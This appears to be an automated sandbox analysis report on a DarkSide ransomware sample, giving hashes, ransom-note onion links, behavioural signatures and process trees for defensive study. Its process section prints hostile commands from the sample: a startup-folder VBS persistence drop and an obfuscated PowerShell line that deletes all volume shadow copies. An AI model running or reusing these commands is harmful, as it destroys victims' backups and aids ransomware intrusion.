Analysis
-
max time kernel
149s -
max time network
115s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
20/12/2023, 14:49
Static task
static1
Behavioral task
behavioral1
Sample
cd2fb1d044d414dcbf32bf67f2563208.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
cd2fb1d044d414dcbf32bf67f2563208.exe
Resource
win10v2004-20231215-en
General
-
Target
cd2fb1d044d414dcbf32bf67f2563208.exe
-
Size
2.3MB
-
MD5
cd2fb1d044d414dcbf32bf67f2563208
-
SHA1
98dae9d51bc1ee7d619a546550adc2e98113db17
-
SHA256
f6ef88d4e7d9db6085e1d64762cc01fc64bfd9cc632f228e84bd5f5038030589
-
SHA512
88a89c729f4edf3cb944de03bed2177cb9b2791de261bbdb15ebeceb075311ba9318abedfa8380a194062b048496f43c9a5bbfdf712f96a69aa4b5d80c1adbde
-
SSDEEP
49152:kloF0g3n0xTxvO0REE0zVeWbKr9P95upyQQoQxlyxBf9NGFzdCh:kloeO0e35NKpPrqyLo4ah9+Mh
Malware Config
Extracted
C:\Users\Admin\README.398da5ec.TXT
darkside
http://darksidedxcftmqa.onion/homehardware/K4fLrrmO5GOIBHbhfJyN5rG4pkPcRlnc48ceUHtNgjONruPRTVc4Usyb96BuHkKa
http://darksidfqzcuhtk2.onion/FJ6BL608YXVN8DGFDP23JVF2RU0K0IC102LSJA09Z2JF14A1SCCJBOVPLRHSLU16
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Renames multiple (155) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 952 set thread context of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 -
Modifies registry class 5 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.398da5ec cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.398da5ec\ = "398da5ec" cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\398da5ec\DefaultIcon cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\398da5ec cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\398da5ec\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\398da5ec.ico" cmd.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
pid Process 952 cd2fb1d044d414dcbf32bf67f2563208.exe 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 2808 powershell.exe 2664 cmd.exe 2664 cmd.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2664 cmd.exe Token: SeSecurityPrivilege 2664 cmd.exe Token: SeTakeOwnershipPrivilege 2664 cmd.exe Token: SeLoadDriverPrivilege 2664 cmd.exe Token: SeSystemProfilePrivilege 2664 cmd.exe Token: SeSystemtimePrivilege 2664 cmd.exe Token: SeProfSingleProcessPrivilege 2664 cmd.exe Token: SeIncBasePriorityPrivilege 2664 cmd.exe Token: SeCreatePagefilePrivilege 2664 cmd.exe Token: SeBackupPrivilege 2664 cmd.exe Token: SeRestorePrivilege 2664 cmd.exe Token: SeShutdownPrivilege 2664 cmd.exe Token: SeDebugPrivilege 2664 cmd.exe Token: SeSystemEnvironmentPrivilege 2664 cmd.exe Token: SeRemoteShutdownPrivilege 2664 cmd.exe Token: SeUndockPrivilege 2664 cmd.exe Token: SeManageVolumePrivilege 2664 cmd.exe Token: 33 2664 cmd.exe Token: 34 2664 cmd.exe Token: 35 2664 cmd.exe Token: SeDebugPrivilege 2808 powershell.exe Token: SeBackupPrivilege 2556 vssvc.exe Token: SeRestorePrivilege 2556 vssvc.exe Token: SeAuditPrivilege 2556 vssvc.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 952 cd2fb1d044d414dcbf32bf67f2563208.exe 952 cd2fb1d044d414dcbf32bf67f2563208.exe -
Suspicious use of WriteProcessMemory 45 IoCs
description pid Process procid_target PID 952 wrote to memory of 1896 952 cd2fb1d044d414dcbf32bf67f2563208.exe 28 PID 952 wrote to memory of 1896 952 cd2fb1d044d414dcbf32bf67f2563208.exe 28 PID 952 wrote to memory of 1896 952 cd2fb1d044d414dcbf32bf67f2563208.exe 28 PID 952 wrote to memory of 1896 952 cd2fb1d044d414dcbf32bf67f2563208.exe 28 PID 952 wrote to memory of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 PID 952 wrote to memory of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 PID 952 wrote to memory of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 PID 952 wrote to memory of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 PID 952 wrote to memory of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 PID 952 wrote to memory of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 PID 952 wrote to memory of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 PID 952 wrote to memory of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 PID 952 wrote to memory of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 PID 952 wrote to memory of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 PID 952 wrote to memory of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 PID 952 wrote to memory of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 PID 952 wrote to memory of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 PID 952 wrote to memory of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 PID 952 wrote to memory of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 PID 952 wrote to memory of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 PID 952 wrote to memory of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 PID 952 wrote to memory of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 PID 952 wrote to memory of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 PID 952 wrote to memory of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 PID 952 wrote to memory of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 PID 952 wrote to memory of 2936 952 cd2fb1d044d414dcbf32bf67f2563208.exe 30 PID 2936 wrote to memory of 2664 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 37 PID 2936 wrote to memory of 2664 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 37 PID 2936 wrote to memory of 2664 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 37 PID 2936 wrote to memory of 2664 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 37 PID 2936 wrote to memory of 2664 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 37 PID 2936 wrote to memory of 2664 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 37 PID 2936 wrote to memory of 2664 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 37 PID 2936 wrote to memory of 2664 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 37 PID 2936 wrote to memory of 2664 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 37 PID 2936 wrote to memory of 2664 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 37 PID 2936 wrote to memory of 2664 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 37 PID 2936 wrote to memory of 2664 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 37 PID 2936 wrote to memory of 2664 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 37 PID 2936 wrote to memory of 2664 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 37 PID 2936 wrote to memory of 2664 2936 cd2fb1d044d414dcbf32bf67f2563208.exe 37 PID 2664 wrote to memory of 2808 2664 cmd.exe 33 PID 2664 wrote to memory of 2808 2664 cmd.exe 33 PID 2664 wrote to memory of 2808 2664 cmd.exe 33 PID 2664 wrote to memory of 2808 2664 cmd.exe 33 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\cd2fb1d044d414dcbf32bf67f2563208.exe"C:\Users\Admin\AppData\Local\Temp\cd2fb1d044d414dcbf32bf67f2563208.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:952 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\Admin\AppData\Local\Temp\cd2fb1d044d414dcbf32bf67f2563208.exe",1: >"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"2⤵
- Drops startup file
PID:1896
-
-
C:\Users\Admin\AppData\Local\Temp\cd2fb1d044d414dcbf32bf67f2563208.exeC:\Users\Admin\AppData\Local\Temp\cd2fb1d044d414dcbf32bf67f2563208.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Windows\SysWOW64\cmd.exeC:\Users\Admin\AppData\Local\Temp\cd2fb1d044d414dcbf32bf67f2563208.exe3⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2664
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2808
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2556
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /D /T1⤵PID:3936
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5951fbf2cb7c24736811bc60cd721e87a
SHA14f8a81e1ba315801435eac03d24bab34a3f98324
SHA2567a05674267fdfa82e3f610f8d3ba8d8c2793899547a9e8d4f6c683be1b80c2f6
SHA512320b63d736ebbc976c5b76fd7d96073be97c08084ca67c00c11caf5dd297daf20b4431fb7e25267d0e6e2faf15ef1a6af4160a3a0eec218e204fb1227a90d0c0
-
Filesize
133B
MD5458d6a199affafd2e9be5198c5ab8d6b
SHA1ca8f469292204a3c10f0bc4dd25c4f3f77e09e1d
SHA256bdcd987973f6215c09b1f22452e93459c9d8b0b8646927c85b96f6ecafd120b7
SHA5129e667d11143f8ac3db1eece5d67348ff34e2384b994e4601f3ba93c4001e5bc6156541b6535218ef0c7f1b64af3f14d15add881240ec45e09ce7734f74ef5bb2
-
Filesize
2KB
MD58f3af937b073ccc1eb6e0693c3922e1e
SHA15a74d49a712238cfd8989fddf0aff1828bee6be6
SHA2562a301030357315a94c20d0ce0d9b12848d9c451a9836dbc8e4d5674444291975
SHA5122c628ec9774aeff244985217079bbdb72b6af7c123f0caace5e14a7f89286ccf16bb29ae022b015a3e52158cc26b080d2a74627aaf843f466cc1328c85a0fabc